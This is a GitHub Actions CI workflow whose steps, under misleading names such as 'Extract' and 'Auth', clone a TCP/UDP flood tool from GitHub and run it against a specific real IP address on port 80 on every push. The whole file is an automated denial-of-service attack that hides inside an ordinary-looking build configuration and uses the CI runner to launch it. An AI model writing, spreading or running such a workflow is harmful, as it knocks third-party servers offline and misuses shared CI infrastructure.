name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - name: Download
      run: git clone https://github.com/Leeon123/TCP-UDP-Flood.git
    - name: Extract
      run: sudo apt install python3-pip
    - name: Auth
      run: python TCP-UDP-Flood/flood.py -i 217.160.12.74 -p 80
